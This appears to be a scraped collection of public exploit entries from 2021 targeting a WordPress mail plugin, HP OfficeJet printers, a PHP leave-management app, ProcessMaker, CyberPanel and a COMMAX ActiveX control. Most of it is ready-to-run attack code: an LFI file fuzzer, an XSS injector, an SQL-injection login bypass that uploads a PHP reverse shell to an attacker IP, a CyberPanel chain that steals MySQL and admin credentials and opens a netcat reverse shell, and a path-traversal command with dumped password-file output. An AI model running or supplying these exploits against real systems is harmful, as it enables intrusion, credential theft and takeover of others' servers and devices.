ISHACK AI BOT

# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2) # Date: 2021-08-24 # Exploit Author: Matheus Alexandre [Xcatolin] # Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip # Version: 1.0 WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. * Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github: https://github.com/Xcatolin/Personal-Exploits/ #!/usr/bin/python # Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability import requests from requests.exceptions import ConnectionError class bcolors: OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' ITALIC = '\33[3m' print(bcolors.BOLD + """\ __ __ _ _ __ __ _ | \/ |__ _(_) |___| \/ |__ _ __| |_ __ _ | |\/| / _` | | |___| |\/| / _` (_-< _/ _` | |_| |_\__,_|_|_| |_| |_\__,_/__/\__\__,_| _ _ ___ _ _ ___ _ _ | | ___ __ __ _| | | __(_) |___ |_ _|_ _ __| |_ _ __(_)___ _ _ | |__/ _ \/ _/ _` | | | _|| | / -_) | || ' \/ _| | || (_-< / _ \ ' \ |____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_| |_ . \_/ _ _ |_ _ |. _ |_)\/. / \(_(_||_(_)||| ) / """ + bcolors.ENDC) endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=" valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC) print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC) target = raw_input("~# ") print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC) try: request = requests.get(target) except ConnectionError: print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC) exit(1) else: print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC) print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC) try: response = requests.get(target + valid) except len(response.content) < 1000 : print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC) exit(1) else: print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC) print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC) wordlist='wordlist.txt' ## Change here lines=open(wordlist, "r").readlines() for i in range(0, len(lines)): word=lines[i].replace("\n","") response = requests.get(target + endpoint + word) if len(response.content) > 500 : print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"

# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS) # Date: 01/08/2021 # Exploit Author: Tyler Butler # Vendor Homepage: https://www8.hp.com/ # Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742 # Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630 # Version: HP OfficeJet 7110 Wide Format ePrinter # Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A # PoC: import requests import json from requests.exceptions import HTTPError target = 'http://192.168.223.1' # The IP of the vulnerable taget payload = '''<script>alert('XSS');</script>''' # The XSS injection payload you want to use path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command pre = ''' <?xml version="1.0" encoding="UTF-8"?> <!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. --> <prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"> <prdcfgdyn2:ProductSettings> <prdcfgdyn:DeviceInformation> <dd:DeviceLocation> ''' # The start of the request body post = ''' </dd:DeviceLocation> </prdcfgdyn:DeviceInformation> </prdcfgdyn2:ProductSettings> </prdcfgdyn2:ProductConfigDyn> ''' # The end of the request body body = pre + payload + post headers = { 'Host':'192.168.223.1', 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0', 'Accept':'*/*', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'text/xml', 'Content-Length':str(len(body.encode('utf-8'))), 'Origin':'https://192.168.223.1', 'Connection':'close', 'Referer':target, } print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90') try: print('{!} Injecting payload :',payload) response = requests.put(target+path, headers = headers, data = body) response.raise_for_status() except HTTPError as http_err: print('{X}',f'HTTP error occurred: {http_err}') except Exception as err: print('{X}',f'Other error occurred: {err}') else: print('{!} Success!')

# Exploit Title: Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated) # Date: 24-08-2021 # Exploit Author: Justin White # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html # Version: V1 # Category: Webapps # Tested on: Linux #!/bin/env python3 import requests import time import sys from colorama import Fore, Style if len(sys.argv) != 4: print('python3 script.py <target url> <attacker ip> <attacker port>') print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1 4444') exit() else: try: url = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] print() print('[*] Trying to login...') time.sleep(1) login = url + '/classes/Login.php?f=login' payload_name = "reverse_shell.php" payload_file = r"""<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip, attacker_port) session = requests.session() post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1-- -'"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() if user_login.text == '{"status":"success"}': print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!') upload_url = url + "/classes/Users.php?f=save" cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"} data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n" print('[*] Trying to Upload Reverse Shell...') time.sleep(2) try: print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse Shell Uploaded!') upload = session.post(upload_url, headers=headers, cookies=cookie, data=data) upload_check = f'{url}/uploads' r = requests.get(upload_check) if payload_name in r.text: payloads = r.text.split('<a href="') for load in payloads: if payload_name in load: payload = load.split('"') payload = payload[0] else: pass else: exit() except: print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Upload failed try again in a little bit!!!!!!\n') exit() try: print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Check Your Listener!\n') connect_url = url + '/uploads/' r = requests.get(connect_url + payload) except: print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + f' Failed to find reverse shell check {connect_url} or try again!\n') else: print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Login failed!\n') except: print('[' + Fore.YELLOW + '!' + Style.RESET_ALL + ']' + ' Something Went Wrong!\n')

# Exploit Title: ProcessMaker 3.5.4 - Local File inclusion # Exploit Author: Ai Ho (@j3ssiejjj) # Date: 16-04-2021 # Vendor Homepage: https://www.processmaker.com/ # Version: ProcessMaker <= 3.5.4 # References: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/process-maker-lfi.yaml # PoC: ## With curl curl -k --path-as-is 'http://targetIP/../../../..//etc/passwd' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin --[snippets]-- ## With Jaeles Scanner jaeles scan -s ~/jaeles-signatures/common/process-maker-lfi.yaml -u http://targetIP

# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated) # Date: 27.08.2021 # Author: Numan Türle # Vendor Homepage: https://cyberpanel.net/ # Software Link: https://github.com/usmannasir/cyberpanel # Version: <=2.1 # https://www.youtube.com/watch?v=J_8iLELVgkE #!/usr/bin/python3 # -*- coding: utf-8 -*- # CyberPanel - Remote Code Execution (Authenticated) # author: twitter.com/numanturle # usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE] # cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time from requests.packages.urllib3.exceptions import InsecureRequestWarning from cmd import Cmd warnings.simplefilter('ignore',InsecureRequestWarning) def init(): parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution') parser.add_argument('-u','--host',help='Host', type=str, required=True) parser.add_argument('-l', '--login',help='Username', type=str, required=True) parser.add_argument('-p', '--password',help='Password', type=str, required=True) parser.add_argument('-f', '--file',help='File', type=str) args = parser.parse_args() exploit(args) def exploit(args): def on_open(ws): verifyPath,socket_password print("[+] Socket connection successful") print("[+] Trying a reverse connection") ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}})) ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password})) ws.close() def on_close(ws, close_status_code, close_msg): print("[+] Successful") print("[!] Disconnect from socket") session = requests.Session() target = "https://{}:8090".format(args.host) username = args.login password = args.password print("[+] Target {}".format(target)) response = session.get(target, verify=False) session_hand = session.cookies.get_dict() token = session_hand["csrftoken"] print("[+] Token {}".format(token)) headers = { 'X-Csrftoken': token, 'Cookie': 'csrftoken={}'.format(token), 'Referer': target } login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"}) login_json = json.loads(login.content) if login_json["loginStatus"]: session_hand_login = session.cookies.get_dict() print("[+] Login Success") print("[+] Send request fetch websites list") headers = { 'X-Csrftoken': session_hand_login["csrftoken"], 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]), 'Referer': target } feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10}) feth_weblist_json = json.loads(feth_weblist.content) if feth_weblist_json["data"]: weblist_json = json.loads(feth_weblist_json["data"]) domain = weblist_json[0]["domain"] domain_folder = "/home/{}".format(domain) print("[+] Successfully {} selected".format(domain)) print("[+] Creating ssh pub") remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1}) create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)}) create_ssh_json = json.loads(create_ssh.content) if create_ssh_json["status"]: key = create_ssh_json["deploymentKey"] print("[+] Key : {}".format(key)) explode_key = key.split() explode_username = explode_key[-1].split("@") if explode_username[0]: username = explode_username[0] hostname = explode_username[1] print("[+] {} username selected".format(username)) print("[+] Preparing for symlink attack") print("[+] Attempting symlink attack with user-level command execution vulnerability #1") target_file = args.file if not target_file: target_file = "/root/.my.cnf" domain_folder_ssh = "{}/.ssh".format(domain_folder) command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username) completeStartingPath = "{}';{};'".format(domain_folder,command) #filemanager/controller - completeStartingPath - command execution vulnerability symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain}) symlink_json = json.loads(symlink.content) if symlink_json["status"]: print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file)) read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)}) read_file_json = json.loads(read_file.content) read_file = read_file_json["deploymentKey"] if not args.file: print("-----------------------------------") print(read_file.strip()) print("-----------------------------------") mysql_password = re.findall('password=\"(.*?)\"',read_file)[0] steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder) print("[+] Fetching users tokens") completeStartingPath = "{}';{}".format(domain_folder,steal_token) steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain}) token_file = domain_folder+"/token.txt" steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain}) leak = json.loads(steal_token_read_request.content) leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:] print("------------------------------") for user in leak: b64de = base64.b64decode(user).decode('utf-8') exp_username = b64de.split(":") if exp_username[0] == "admin": admin_password = exp_username[1] print("[+] " + b64de) print("------------------------------") print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~") print("[+] Try login admin") headers = { 'X-Csrftoken': token, 'Cookie': 'csrftoken={}'.format(token), 'Referer': target } login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"}) login_json = json.loads(login_admin.content) if login_json["loginStatus"]: session_hand_login = session.cookies.get_dict() print("[+] 4dm1n_l061n_5ucc355") print("[+] c0nn3c71n6_70_73rm1n4l") headers = { 'X-Csrftoken': session_hand_login["csrftoken"], 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]), 'Referer': target } get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False) verifyPath = re.findall('id=\"verifyPath\">(.*?)</div>',str(get_websocket_token.content))[-1] socket_password = re.findall('id=\"password\">(.*?)</div>',str(get_websocket_token.content))[-1] print("[+] verifyPath {}".format(verifyPath)) print("[+] socketPassword {}".format(socket_password)) print("[+] Trying to connect to socket") ws = websocket.WebSocketApp("wss://{}:5678".format(args.host), on_open=on_open, on_close=on_close) ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE}) else: print("[-] Auto admin login failed") else: print(read_file) else: print("[-] Unexpected") else: print("[-] Username selected failed") else: print("[-] Fail ssh pub") else: print("[-] List error") else: print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"])) if __name__ == "__main__": init()

# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 2.1.4.5 Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR. Desc: The vulnerability is caused due to a boundary error in the processing of user input, which can be exploited to cause a buffer overflow when a user inserts overly long array of string bytes through several functions. Successful exploitation could allow execution of arbitrary code on the affected node. Tested on: Microsoft Windows 10 Home (64bit) EN Microsoft Internet Explorer 20H2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5663 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php 02.08.2021 -- $ python >>> "A"*1000 [ToTheClipboard] >>>#Paste in ID or anywhere (5220.5b30): Access violation - code c0000005 (!!! second chance !!!) wow64!Wow64pNotifyDebugger+0x19918: 00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00 0:038> g (5220.5b30): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL - CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aa rep stos byte ptr es:[edi] 0:038:x86> r eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141 eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aa rep stos byte ptr es:[edi] 0:038:x86> !exchain 0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950) 0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20) CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806) func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f) 0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29) Invalid exception stack at ffffffff 0:038:x86> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c 02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 0:038:x86> d esp 0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~. 0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... 0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... 0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%[email protected]. ... 0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... 0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v 0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v 0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... 0:038:x86> d ebp 0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... 0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... 0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%[email protected]. ... 0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... 0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v 0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v 0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... 0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................ 0:038:x86> d esi 41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0:038:x86> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX - GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: CNC_Ctrl!DllUnregisterServer+f5501 0b4d43bf f3aa rep stos byte ptr es:[edi] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 41414141 Attempt to write to address 41414141 FAULTING_THREAD: 00005b30 DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE PROCESS_NAME: IEXPLORE.EXE ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE_STR: c0000005 EXCEPTION_PARAMETER1: 00000001 EXCEPTION_PARAMETER2: 41414141 FOLLOWUP_IP: CNC_Ctrl!DllUnregisterServer+f5501 0b4d43bf f3aa rep stos byte ptr es:[edi] WRITE_ADDRESS: 41414141 WATSON_BKT_PROCSTAMP: 95286d96 WATSON_BKT_PROCVER: 11.0.19041.1 PROCESS_VER_PRODUCT: Internet Explorer WATSON_BKT_MODULE: CNC_Ctrl.DLL WATSON_BKT_MODSTAMP: 547ed821 WATSON_BKT_MODOFFSET: 1043bf WATSON_BKT_MODVER: 1.7.0.2 MODULE_VER_PRODUCT: CNC_Ctrl Module BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116 ANALYSIS_VERSION: 10.0.16299.91 amd64fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: [0n301] Type: [@ACCESS_VIOLATION] Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: [Unspecified] TID: [0x5b30] Frame: [0] : CNC_Ctrl!DllUnregisterServer ID: [0n274] Type: [INVALID_POINTER_WRITE] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [0x5b30] Frame: [0] : CNC_Ctrl!DllUnregisterServer ID: [0n152] Type: [ZEROED_STACK] Class: Addendum Scope: BUCKET_ID Name: Add Data: Omit PID: [0x5220] TID: [0x5b30] Frame: [0] : CNC_Ctrl!DllUnregisterServer BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546 THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5 FAULT_INSTR_CODE: 458baaf3 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501 FOLLOWUP_NAME: MachineOwner MODULE_NAME: CNC_Ctrl IMAGE_NAME: CNC_Ctrl.DLL DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 STACK_COMMAND: ~38s ; .cxr ; kb FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501 FAILURE_EXCEPTION_CODE: c0000005 FAILURE_IMAGE_NAME: CNC_Ctrl.DLL BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL FAILURE_MODULE_NAME: CNC_Ctrl BUCKET_ID_MODULE_STR: CNC_Ctrl FAILURE_FUNCTION_NAME: DllUnregisterServer BUCKET_ID_FUNCTION_STR: DllUnregisterServer BUCKET_ID_OFFSET: f5501 BUCKET_ID_MODTIMEDATESTAMP: 547ed821 BUCKET_ID_MODCHECKSUM: 357a4b BUCKET_ID_MODVER_STR: 1.7.0.2 BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1 TARGET_TIME: 2021-08-12T12:21:50.000Z OSBUILD: 19042 OSSERVICEPACK: 1023 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: unknown_date BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.1023 ANALYSIS_SESSION_ELAPSED_TIME: 1d869 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} Followup: MachineOwner ---------

